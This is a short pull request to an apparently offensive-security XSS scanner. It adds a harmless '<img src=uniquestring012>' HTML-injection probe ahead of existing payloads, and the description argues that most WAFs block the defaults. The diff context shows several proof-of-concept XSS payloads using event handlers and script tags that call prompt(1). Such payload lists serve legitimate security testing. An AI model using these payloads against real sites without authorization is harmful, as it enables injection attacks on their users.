### PR TITLE
Improvement for default XSS payloads at xss.py

### DIFF
--- a/xss.py
+++ b/xss.py
@@ -305,6 +305,7 @@ if not os.path.isdir(d_output):
 # source: https://twitter.com/brutelogic/status/1138805808328839170
 if not n_payloads:
     t_payloads = [
+	'<img src=uniquestring012>',
         '\'"--><a autofocus onfocus=prompt(1) href=?>.',
         '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>',
         '\'"--><svG><scRIpt href=data:,prompt(1) />',


### PR DESCRIPTION
99% of WAFs will block the requests with default payloads. I suggest checking for <img src=uniquestring012> to detect a basic HTML injection and then act accordingly if found.